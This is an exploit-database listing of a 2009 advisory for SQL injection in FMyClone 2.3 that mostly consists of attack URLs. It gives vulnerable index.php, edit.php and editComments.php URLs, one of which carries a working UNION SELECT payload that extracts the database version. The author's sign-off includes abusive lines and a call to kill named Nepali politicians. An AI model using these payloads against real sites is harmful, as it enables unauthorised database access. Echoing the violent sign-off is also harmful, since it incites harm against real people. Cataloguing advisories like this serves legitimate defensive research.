header-logo
Suggest Exploit
vendor:
FMyClone
by:
learn3r aka cyb3r lord
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: FMyClone
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: N/A
Related CWE: N/A
CPE: a:fmyclone:fmyclone:2.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

FMyClone V2.3 Multiple SQLi

FMyClone V2.3 is vulnerable to multiple SQL injection attacks. The vulnerable URLs are http://localhost/exploit/FMyClone%20V2.3/index.php?comp=[SQLi/BSQL], http://localhost/exploit/FMyClone V2.3/edit.php?act=comment&comp=2&id=[SQLi] and http://localhost/exploit/FMyClone%20V2.3/editComments.php?comp=1%27+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11--+. The first two URLs require admin privileges to exploit.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#####################################
#   FMyClone V2.3 Multiple SQLi     #
#   By learn3r hacker from nepal    #
#    damagicalhacker@gmail.com      #
#####################################

Product name: FMyClone
Version: 2.3 or maybe lower
Home: fmyclone.com

Different things might require some privileges to work but still sometimes these might be useful.

Vulns in the scripts:

http://localhost/exploit/FMyClone%20V2.3/index.php?comp=[SQLi/BSQL]

http://localhost/exploit/FMyClone V2.3/edit.php?act=comment&comp=2&id=[SQLi]
      //requires admin privilege

http://localhost/exploit/FMyClone%20V2.3/editComments.php?comp=1%27+union+all+select+1,2,@@version,4,5,6,7,8,9,10,11--+

And maybe there are more vulns in the scripts but I don't have time to analyze (Dashain, Exams and all on the head).


Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!

# milw0rm.com [2009-09-17]

Navigation

Suggest Exploit

Services By CQR